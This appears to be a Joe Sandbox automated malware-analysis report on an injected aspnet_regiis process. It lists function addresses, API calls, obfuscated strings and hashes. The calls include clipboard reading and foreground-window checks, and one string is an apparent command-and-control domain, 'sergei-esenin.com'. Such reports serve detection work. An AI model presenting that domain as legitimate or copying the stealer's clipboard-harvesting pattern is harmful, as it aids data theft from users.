Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e95a682713fb36379ed0b273e766bbc5e2ddb5099d14bae877f99eba9e9d4db0
Instruction ID: 391b2c460cab2ccd826cd198101ec5d1786700773442ead789b550e625f9d816
Opcode Fuzzy Hash: e95a682713fb36379ed0b273e766bbc5e2ddb5099d14bae877f99eba9e9d4db0
Instruction Fuzzy Hash: C721F034388301AFE720CA19CDC1B2677A7BBD5301F29A82CE591A72C5CAB0E8069B51

Function 0055DF90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(77DF0993,00000000,83828980), ref: 0055E093

Strings

}({, xrefs: 0055DFFE

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: LibraryLoad
String ID: }({
API String ID: 1029625771-3992779883
Opcode ID: a9f887d399dab05f111811515f642ba84eb92a6d6dfb592c10585a96b7a81803
Instruction ID: b0ca863e2d73712468ea9fa094b29c5171875a7ff2503568efae8f696322c74f
Opcode Fuzzy Hash: a9f887d399dab05f111811515f642ba84eb92a6d6dfb592c10585a96b7a81803
Instruction Fuzzy Hash: 842148722593404BD314CFA5DDD27ABBBE0EBDA304F18093DE1D157391D2B889098B5A

Function 0058DAC0 Relevance: 1.6, APIs: 1, Instructions: 88
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0058DB69

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6649bbf0c11e2710cbf874c65482368e04164dd4f99e74d9854f7a496b33a425
Instruction ID: e79b256ab2d689a9f628db78e814a7c3d895a23dbdb2e3fad7cd877128320e75
Opcode Fuzzy Hash: 6649bbf0c11e2710cbf874c65482368e04164dd4f99e74d9854f7a496b33a425
Instruction Fuzzy Hash: FE115937A152204BC314CA7CCC9565BBB96DFDA221F2B462DECD89B3D1DA715C0583D1

Function 0059092A Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 005909B3

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 8959208856fbceae0595500bcc9b7ae1a4eaea33d7da2341af6b12679c45bd65
Instruction ID: 0d01fe1d129d1b4b2fa49cbd5ddf5e9789294d1131b9ac4a10e00423078e418c
Opcode Fuzzy Hash: 8959208856fbceae0595500bcc9b7ae1a4eaea33d7da2341af6b12679c45bd65
Instruction Fuzzy Hash: 2A114C779887144BC718CF7CECC2016BFD1EBE2260B19563ED5A2833E1D5785D4D9641

Function 0058DA90 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0058DA95

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 25760631175eb671bfd3136b3e97cc537f30cb1574daf7f907d81d1c8a2c621b
Instruction ID: 6e585aaff42a4c5f93f4d87ee19796cdb418c3cf55d65160a72cf54f3c9ab3a4
Opcode Fuzzy Hash: 25760631175eb671bfd3136b3e97cc537f30cb1574daf7f907d81d1c8a2c621b
Instruction Fuzzy Hash: 7FB09230148100CBC6084B20EC04B203639AB6E211F20104A9409055A1C6315856EA40

Function 005909A5 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 005909B3

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: e1b5503d1e446dc9f8f1b62cbe34899790126077fa9f05e15ab960a3b75d8b8b
Instruction ID: 9e1081cef2fe0497010021a629d80940eedaee10cd329c66fd6652c12aef5e7d
Opcode Fuzzy Hash: e1b5503d1e446dc9f8f1b62cbe34899790126077fa9f05e15ab960a3b75d8b8b
Instruction Fuzzy Hash: 66E0C23AA04100DFD704DF28FC964343BA0EB2A214306056BE043C3361C6345A1CEB93

Non-executed Functions

Function 00577CE3 Relevance: 26.1, Strings: 20, Instructions: 1084COMMON

Download Yara Rule

Strings

aQaS, xrefs: 0057824E
6I5K, xrefs: 0057862E
HyK{, xrefs: 0057827E
Hu@s, xrefs: 005783A3
4E:G, xrefs: 00578610
u5`7, xrefs: 00577E61
l]j_, xrefs: 00578247
!, xrefs: 00577E7F
AC, xrefs: 00577CEF
r1`3, xrefs: 00577E57
eUgW, xrefs: 00578255
MO, xrefs: 00577FC7
sAuC, xrefs: 00578232
n9m;, xrefs: 00577E6B
MO, xrefs: 00577D0D
AC, xrefs: 00577FB2
]_, xrefs: 00577FE3
*(, xrefs: 00578090
*(, xrefs: 0057850D
M0O, xrefs: 00578624

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: AC$M0O$ !$*($*($4E:G$6I5K$Hu@s$HyK{$aQaS$eUgW$l]j_$n9m;$r1`3$sAuC$u5`7$AC$MO$MO$]_
API String ID: 0-3249452353
Opcode ID: 69d9c203da0bd4d44beab9319c5f8550bf01830a7bd972941176e855ca25b690
Instruction ID: d286deec80a207478258115d76a65c22dbf8751a58157a5449804daf2a14d9b0
Opcode Fuzzy Hash: 69d9c203da0bd4d44beab9319c5f8550bf01830a7bd972941176e855ca25b690
Instruction Fuzzy Hash: F292BCB5A00715CFDB24CF25D8807AABBB2FF89300F558A9DC4996B751DB30A942DF90

Function 0057E850 Relevance: 23.2, APIs: 1, Strings: 11, Instructions: 2238COMMON

Download Yara Rule

Strings

NLF|, xrefs: 0057F323
AE^1, xrefs: 0057EA35
z\B=, xrefs: 0057FD1C
8>7, xrefs: 0058034D
4_2], xrefs: 0057F95C
]\C , xrefs: 0057EA21
/Hla, xrefs: 0057FC27
sgz/, xrefs: 0057E87B
BHla, xrefs: 0057FCA1
-(#, xrefs: 0057F188
gav`, xrefs: 00580596

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 8>7$-(#$/Hla$4_2]$AE^1$BHla$NLF|$]\C $gav`$sgz/$z\B=
API String ID: 0-43102410
Opcode ID: 8625f05ecaabc373b051b364a856c05e8e9407ee6738e74e40e70a2fa85381ed
Instruction ID: 6b141d724db7e9cd2845c8712d2a6dd94b3e73be4f426c34767636ef9c44711d
Opcode Fuzzy Hash: 8625f05ecaabc373b051b364a856c05e8e9407ee6738e74e40e70a2fa85381ed
Instruction Fuzzy Hash: 65F20370504B818EE726CF35C4917A3BFE1AF57304F0889ADC5EB4B682D779A40ADB61

Function 00584BE0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 122clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00584BFB
GetWindowLongW.USER32 ref: 00584C26
GetClipboardData.USER32 ref: 00584C36
CloseClipboard.USER32 ref: 00584D4E

Strings

,, xrefs: 00584CB9
", xrefs: 00584CB1
!, xrefs: 00584CB5
', xrefs: 00584CA5
", xrefs: 00584C9D
!, xrefs: 00584C95

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID: !$!$"$"$'$,
API String ID: 1647500905-753487525
Opcode ID: 8996e90f032804558cfe1a0edceed07a0cd818ce03c3473dfede3457694c8abc
Instruction ID: 999b21e62567bdd175408b5fac7f2edd578966a9890ac418671b427a259254ae
Opcode Fuzzy Hash: 8996e90f032804558cfe1a0edceed07a0cd818ce03c3473dfede3457694c8abc
Instruction Fuzzy Hash: D441B771909396CFDB00ABFCD8483EEBFA0AB55320F150A29DC91A72C1D3754948CBA2

Function 005512D5 Relevance: 16.0, Strings: 12, Instructions: 987COMMON

Download Yara Rule

Strings

0000, xrefs: 005527A5
0000, xrefs: 005527C8
i, xrefs: 00552A7E
0, xrefs: 005521FF
0000, xrefs: 005527AC
0000, xrefs: 005527BA
0000, xrefs: 0055280E
0000, xrefs: 005527C1
@, xrefs: 005529AF
0, xrefs: 00552151
0, xrefs: 00552449
0000, xrefs: 005527B3

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
API String ID: 0-3385986306
Opcode ID: 8aa32da55a988c76eb1b367bcf1c0e1d4e82f36a6faacf38517b5ae69dc531e4
Instruction ID: 739aee2a4c5cf3e85e6b2a32db33de3ae1064b583a5b7f7e4284292c1d148467
Opcode Fuzzy Hash: 8aa32da55a988c76eb1b367bcf1c0e1d4e82f36a6faacf38517b5ae69dc531e4
Instruction Fuzzy Hash: 4782B4756093818FC719CF28C4A432ABFE1BB96305F18895EE8DA97391D374DD49CB82

Function 0056EEE0 Relevance: 13.9, Strings: 10, Instructions: 1432COMMON

Download Yara Rule

Strings

[AJ, xrefs: 0056EF6E
URSP, xrefs: 0056F0F1
L, xrefs: 0056F588
P, xrefs: 0056FA8A
anol, xrefs: 0056F0D0
LM[, xrefs: 0056F6B5, 0056F605, 0056F51F, 0056F4D0, 0056F46C
%*+(, xrefs: 0056F18B
!./7, xrefs: 0056F180
1>?<, xrefs: 0056F154
ET]?, xrefs: 0056F878

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: !./7$%*+($1>?<$ET]?$L$LM[$P$URSP$[AJ$anol
API String ID: 0-2024409930
Opcode ID: 140116f189ecb48a1096c9da80deb76cc73a0818d093eca4a9e5fb9c932727d4
Instruction ID: 681d4a9bde93cd30c5b15bf2170094aa8e20e7b9d15d81037012d96344f3dbc6
Opcode Fuzzy Hash: 140116f189ecb48a1096c9da80deb76cc73a0818d093eca4a9e5fb9c932727d4
Instruction Fuzzy Hash: E3A2BD716083818BD724CF25D8917ABBFE2FFD6304F18892DE4D98B292D7799805CB52

Function 0057F776 Relevance: 13.5, APIs: 1, Strings: 6, Instructions: 1213COMMON

Download Yara Rule

Strings

z\B=, xrefs: 0057FD1C
8>7, xrefs: 0058034D
4_2], xrefs: 0057F95C
/Hla, xrefs: 0057FC27
BHla, xrefs: 0057FCA1
gav`, xrefs: 00580596

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 8>7$/Hla$4_2]$BHla$gav`$z\B=
API String ID: 0-2584419158
Opcode ID: c1ed73868327030fcd6049c191585a10c7af09893101ba9a2e63cfb9d05959bf
Instruction ID: fe2e24fe8c4e553b43801bf03a9bc77fc2ffaf97680190873770325f231f12cc
Opcode Fuzzy Hash: c1ed73868327030fcd6049c191585a10c7af09893101ba9a2e63cfb9d05959bf
Instruction Fuzzy Hash: 1482E570504B818EE726CF35C4947A3BFE1AF53304F4889ADC4EB8B692D779650ADB21

Function 00561048 Relevance: 12.8, APIs: 1, Strings: 7, Instructions: 832COMMON

Download Yara Rule

APIs

Part of subcall function 00584BE0: OpenClipboard.USER32 ref: 00584BFB

CoUninitialize.OLE32 ref: 00561255

Strings

nEjK, xrefs: 005617C8
oi, xrefs: 00561485
w'q, xrefs: 00561477
k=e, xrefs: 0056148C
Vqvw, xrefs: 005617DD
{u, xrefs: 00561470
sergei-esenin.com, xrefs: 00561566

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: ClipboardOpenUninitialize
String ID: Vqvw$nEjK$sergei-esenin.com$k=e$oi$w'q${u
API String ID: 282776578-1857108234
Opcode ID: 488a6de8ff20071b5e3e94216e9c7ad636818efb02b6b432bf1716dbdb297e52
Instruction ID: 69928f6ebe7a61e4ce41b5a649817679de56dc5cf483aaf5179f6012ff6388d8
Opcode Fuzzy Hash: 488a6de8ff20071b5e3e94216e9c7ad636818efb02b6b432bf1716dbdb297e52
Instruction Fuzzy Hash: CC5230B1204B418FE7248F25D8A572BBFB2FF96304F18855CD4864BB92D739E846CB91

Function 005764CB Relevance: 12.0, Strings: 9, Instructions: 716COMMON

Download Yara Rule

Strings

BjW, xrefs: 00576952, 00576A37
>408, xrefs: 005765A1
BAoo, xrefs: 00576603
%!?-, xrefs: 005765AF
-:4, xrefs: 005765A8
BkW, xrefs: 00576B2B
TY, xrefs: 00576667
EAFD, xrefs: 005765FC
!!KM, xrefs: 005765CB

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: !!KM$%!?-$-:4$>408$BAoo$BjW$BkW$EAFD$TY
API String ID: 0-1566944473
Opcode ID: 121039ed4f4fbda681948424c769c2ee554c15585af2c3cd391a8488f4bf8a6c
Instruction ID: 50fe0b3adce80e85feaba4b562a75b8ac339bac329b3515b143886f88846e472
Opcode Fuzzy Hash: 121039ed4f4fbda681948424c769c2ee554c15585af2c3cd391a8488f4bf8a6c
Instruction Fuzzy Hash: E2320F75A00626CFEB14CF68EC907AEBBB2FF58310F1A81A9D545AB391D7309941DB90

Function 00579467 Relevance: 11.7, Strings: 9, Instructions: 466COMMON

Download Yara Rule

Strings

^)O+, xrefs: 00579555
-Y4[, xrefs: 00579581
5]0_, xrefs: 0057958C
D9y;, xrefs: 00579529
:U*W, xrefs: 00579576
9Q=S, xrefs: 0057956B
T1]3, xrefs: 00579513
$IJK, xrefs: 005795AD
%E*G, xrefs: 005795A2

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: $IJK$%E*G$-Y4[$5]0_$9Q=S$:U*W$D9y;$T1]3$^)O+
API String ID: 0-1134212892
Opcode ID: f64a371bdf05ba3950b596dd86686690d4ed10c528a46891601865e8f88c51d0
Instruction ID: fc9a0de9f7dc7b138e65beff155cd1a0eca2f2c754828879ccac451ce03cfc49
Opcode Fuzzy Hash: f64a371bdf05ba3950b596dd86686690d4ed10c528a46891601865e8f88c51d0
Instruction Fuzzy Hash: D7E1DEB1608341DFE720CF24ED90B6BBBB1FB95300F55882DE5C99B251D734990ADB92

Function 0055D5B0 Relevance: 11.5, Strings: 9, Instructions: 288COMMON

Download Yara Rule

Strings

ax`g, xrefs: 0055D5F0
rkOL, xrefs: 0055D600
lxyg, xrefs: 0055D5E8
\402, xrefs: 0055D60B
f, xrefs: 0055D8B8
Oz|{, xrefs: 0055D80E
2-, xrefs: 0055D616
J%{o, xrefs: 0055D5E0
km, xrefs: 0055D8B1

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 2-$J%{o$Oz|{$\402$ax`g$f$km$lxyg$rkOL
API String ID: 0-1937825257
Opcode ID: 9412e4017cbadb1f459ba9005e3dc8965fb1477e5eddcd1d6e48edd8a52363dc
Instruction ID: a173dc8baa6b3184dea71831180ea79056ffe2b4ff0d0ed64d7d511940b3e340
Opcode Fuzzy Hash: 9412e4017cbadb1f459ba9005e3dc8965fb1477e5eddcd1d6e48edd8a52363dc
Instruction Fuzzy Hash: B591B07150C3848BD329CF2984A17ABBFE0FF96305F14496DE8E54B391C7398909CBA6

Function 00592B80 Relevance: 6.0, Strings: 4, Instructions: 1027COMMON

Download Yara Rule

Strings

r8Y, xrefs: 005937F9
D2Y, xrefs: 005931D0
"4Y, xrefs: 00593412
F3Y, xrefs: 005931D9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: "4Y$D2Y$F3Y$r8Y
API String ID: 0-2493739190
Opcode ID: 73d981e85e47fd96485fbbaba3a3e27d77826974794bc8d0e5b1ad186be4897c
Instruction ID: 215871598052e944a15f08f01ad03dd1cdebe56748c27c5562175680d28a3700
Opcode Fuzzy Hash: 73d981e85e47fd96485fbbaba3a3e27d77826974794bc8d0e5b1ad186be4897c
Instruction Fuzzy Hash: 00620435B14251CFCB08CF68D8A16AAB7F2FF9A310F0A847ED94697351D7349949CB80

Function 00592EA0 Relevance: 5.8, Strings: 4, Instructions: 778COMMON

Download Yara Rule

Strings

r8Y, xrefs: 005937F9
D2Y, xrefs: 005931D0
"4Y, xrefs: 00593412
F3Y, xrefs: 005931D9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: "4Y$D2Y$F3Y$r8Y
API String ID: 0-2493739190
Opcode ID: bd281989e1ab17de12d7a448b16cff2c02595ad8b43b94fcb021ccf2be1a4177
Instruction ID: 65f1aef52777f64aa58d6dfb54ee9330a7faca1bf6ab27c871418fd840f90eeb
Opcode Fuzzy Hash: bd281989e1ab17de12d7a448b16cff2c02595ad8b43b94fcb021ccf2be1a4177
Instruction Fuzzy Hash: C832F236B15211CFCB08CF68D8916AAB7F2FB8D314F0A857ED89697351D734A949CB80

Function 00592F90 Relevance: 5.8, Strings: 4, Instructions: 756COMMON

Download Yara Rule

Strings

r8Y, xrefs: 005937F9
D2Y, xrefs: 005931D0
"4Y, xrefs: 00593412
F3Y, xrefs: 005931D9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: "4Y$D2Y$F3Y$r8Y
API String ID: 0-2493739190
Opcode ID: b06d76ca3cc308533bbe4ab979448a008322554e9991e7f159bc5cbd80e3e05b
Instruction ID: 29d897433e0b4536e093552d4b5d5f8ee8d4cb127c7fdfdcfc32a1fc7a476915
Opcode Fuzzy Hash: b06d76ca3cc308533bbe4ab979448a008322554e9991e7f159bc5cbd80e3e05b
Instruction Fuzzy Hash: 57320336B15215CFCB08CF68D8916AABBF2FF89314F0A847ED89597351D7349905CB90

Function 00576F20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

LM, xrefs: 0057753A
8;, xrefs: 00576F63

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 8;$LM
API String ID: 0-465348834
Opcode ID: 20017171285031ddc8ca2bde7da58deac44f2d1c9dc6c95f59ebeb0607814044
Instruction ID: 090cb8c5c8850d9bc879ae554213c3b70c4a7d874b82b5efd832c6224d51d60f
Opcode Fuzzy Hash: 20017171285031ddc8ca2bde7da58deac44f2d1c9dc6c95f59ebeb0607814044
Instruction Fuzzy Hash: F4F1C9B45183458BE700DF64E89166BBBE0FF96314F048D2CF4D89B291E3789909DB96

